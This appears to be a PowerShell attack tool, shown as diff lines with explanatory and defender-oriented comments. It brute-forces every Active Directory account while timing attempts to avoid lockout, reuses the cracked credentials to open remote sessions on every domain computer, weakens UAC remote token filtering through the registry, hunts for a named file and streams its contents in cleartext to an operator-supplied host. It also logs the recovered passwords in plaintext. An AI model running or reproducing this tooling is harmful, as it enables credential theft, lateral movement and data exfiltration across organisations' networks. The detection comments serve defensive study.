# Script-wide out-slot: BruteForceUser writes the matched password here via
# a [REF] parameter, and BeginImpant reads it back after each account.
- $global:global_password = $null
# Tries every entry of $passwords against one account by binding to the
# current domain with System.DirectoryServices.DirectoryEntry (the
# New-Object call below); a non-null .name on the bound object is taken as
# a successful authentication.
# Parameters:
#   $passwords               - candidate passwords, tried in order
#   $username                - account under test
#   $lockoutThreshold        - domain LockoutThreshold (supplied by caller)
#   $lockoutObsWindowSeconds - domain LockoutObservationWindow in seconds
#   $LogFile                 - optional path; on success a line is appended
#   $global_password         - [REF] out-parameter; receives the matched
#                              password, "" when none matched
# Returns 1 when a password matched, 0 when the list is exhausted.
# Defender note: every failed bind is a logon-failure audit event on the
# domain controller, and the loop deliberately pauses once the failure
# count reaches LockoutThreshold, so the observable pattern is bursts of
# failures per account just below the lockout limit followed by a pause of
# roughly one observation window.
- function BruteForceUser {
- param ( [string []] $passwords, [string] $username, [int32] $lockoutThreshold, [double] $lockoutObsWindowSeconds, [string] $LogFile, [REF]$global_password)
- $attemps = 0
- $global_password.Value = ""
- Write-Output "----------------------------------------------------------------------"
- Write-Output "[*] Brute Forcing passwords for username: '$username'"
- foreach ($password in $passwords) {
- Write-Output "Trying password $password"
- if($attempts -eq $lockoutThreshold) {
- Write-Output "Hit threshold limit...sleeping"
# Sleep slightly longer than the observation window so the DC's bad-password
# counter resets; the +3 is applied to the variable, so it accumulates on
# each successive pause.
- $lockoutObsWindowSeconds = $lockoutObsWindowSeconds + 3
- Start-Sleep $lockoutObsWindowSeconds
- $attempts = 0
- Write-Output "Reattempting to brute force"
- }
# Bind to the current domain's DN with the candidate credential; the bind is
# only evaluated when .name is read on the next line.
- $dom = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$(([adsi]'').distinguishedName)",$username,$password)
- $res = $dom.name
- if($res -eq $null) {
- Write-Output "Password '$password' was wrong"
- $attempts = $attempts + 1
- }
- else {
- Write-Output "Password '$password' was right!!!"
# Plaintext username/password pair is written to $LogFile (or stdout).
- if($LogFile) {
- Add-Content $LogFile "$username has this password: $password"
- }
- else {
- Write-Output "'$username' has this password: '$password'"
- }
- $global_password.Value = $password
- return 1
- }
- }
- Write-Output "Not able to brute force password for'$username'"
- return 0
- }
# Entry point. Enumerates every user in the domain (Get-ADUser -Filter *),
# runs BruteForceUser against each one with the password file, then uses
# every recovered credential to open a PSSession on every domain computer
# (Get-ADComputer -Filter *), sets LocalAccountTokenFilterPolicy to 1 in
# the remote registry, searches C:\ recursively for $FileName and writes
# the file's text over a plain TCP connection to $Target.
# Parameters:
#   $PassList - path to the password list read with Get-Content
#   $FileName - file name passed to Get-ChildItem -Filter on each host
#   $Target   - "ip:port" string; split on ':' for the TcpClient
#   $LogFile  - optional log path passed through to BruteForceUser
# Requires the ActiveDirectory module (Import-Module activedirectory) and
# runs in the context of the logged-on user (Get-ADDomain -Current
# LoggedOnUser).
# Defender note: the artifacts this produces are domain-wide user and
# computer enumeration, the burst-and-pause failed-logon pattern from a
# single source, WinRM sessions fanning out from one host to many, a
# modification of LocalAccountTokenFilterPolicy (which weakens UAC remote
# token filtering for local accounts), a full-disk Get-ChildItem on each
# host, and an unencrypted outbound TCP stream carrying file contents.
- function BeginImpant {
- param( [string] $PassList, [string] $FileName, $Target, [string] $LogFile)
- Import-Module activedirectory
- $domain = (Get-ADDomain -Current LoggedOnUser).distinguishedName
# The receiving socket is opened before any credential work starts, so the
# outbound connection is visible even if no password is ever recovered.
- $ip = $Target.split(":")[0]
- $port = [int] $Target.split(":")[1]
- $socket = New-Object Net.Sockets.TcpClient($ip,$port) -ErrorAction Stop
- $tcpStream = $socket.GetStream()
- $writer = New-Object System.IO.StreamWriter($tcpStream)
- $writer.AutoFlush = $true
- $userAccounts = Get-ADUser -Filter * -SearchBase $domain | Select-Object -ExpandProperty SamAccountName
- [string []] $passwordList = Get-Content -Path $PassList
# Lockout settings are read from the default domain password policy and
# handed to BruteForceUser, which paces its attempts against them.
- $accountInfo = Get-ADDefaultDomainPasswordPolicy | Select LockoutThreshold, LockoutObservationWindow
- $lockoutThreshold = $accountInfo.LockoutThreshold
- $lockoutObsWindow = $accountInfo.LockoutObservationWindow.TotalSeconds
- $successfulAccounts = @()
- foreach ($userName in $userAccounts) {
- Write-Output "[*] Processing username: '$userName'"
- BruteForceUser $passwordList $userName $lockoutThreshold $lockoutObsWindow $LogFile ([REF]$global:global_password)
- if($global_password -eq "") {Write-Output "Password not found"}
- else {
# Recovered pairs are kept in memory as username/password objects.
- $res = "" | Select-Object username,password
- $res.username = $userName
- $res.password = $global_password
- $successfulAccounts += $res
- }
- }
- Write-Host $successfulAccounts
- $computers = Get-ADComputer -Filter * | Select -ExpandProperty name
- Write-Host $computers
# Every recovered credential is tried against every computer (full cross
# product), one PSSession per pair.
- foreach($computer in $computers) {
- foreach($userInfo in $successfulAccounts) {
# Build a PSCredential from the plaintext password held in memory.
- $secstr = New-Object -TypeName System.Security.SecureString
- $userInfo.password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
- $cred = New-Object -typename System.Management.Automation.PSCredential $userInfo.username,$secstr
- $uname = $userInfo.username
- try {
# A failed session open is silenced here; the later Invoke-Command calls
# then throw on the null session and land in the catch below.
- $s = New-PSSession -ComputerName $computer -Credential $cred -ErrorAction SilentlyContinue
- $checkKeyExists = Invoke-Command -Session $s -Scriptblock {Test-Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy -ErrorAction SilentlyContinue}
- if($checkKeyExists -eq $false) {
- Write-Host "Creating registry key on $computer"
- Invoke-Command -Session $s -Scriptblock {New-Item -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LocalAccountTokenFilterPolicy -ErrorAction SilentlyContinue -Force}
- }
# Unconditionally sets the value to "1" on the remote host; this registry
# write is a durable, auditable change worth alerting on.
- Write-Host "Setting value of key to 1 in $computer"
- Invoke-Command -Session $s -Scriptblock {Set-Item -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy -Value "1" -ErrorAction SilentlyContinue}
# Recursive search of the whole C:\ volume, hidden/system files included
# (-Force); errors are suppressed, so partial results are possible.
- $res = Invoke-Command -Session $s -Scriptblock {param($fname) Get-ChildItem -Path C:\ -Recurse -Filter $fname -ErrorAction SilentlyContinue -Force} -ArgumentList $FileName
- if ($res -eq $null) {
- Write-Output "File not found in user $uname in computer $computer"
- }
- else {
# If the filter matched more than one file, $res.FullName is a collection;
# the ReadAllText call below only handles a single path.
- $filePath = $res.FullName
- $fileContent = Invoke-Command -Session $s -Scriptblock {param($fpath) [IO.File]::ReadAllText($fpath)} -ArgumentList $filePath
- Write-Host "File found...: $fileContent"
- Write-Host "Sending file to server"
# File text leaves the host in cleartext over the TCP stream opened above.
- $writer.WriteLine($fileContent)
- }
- Remove-PSSession $s
- }
# Any failure for this computer/credential pair is swallowed with a single
# message; the session is not removed on this path.
- catch {
- Write-Output "Some error occured in computer $computer with user $uname"
- }
- }
- }
- }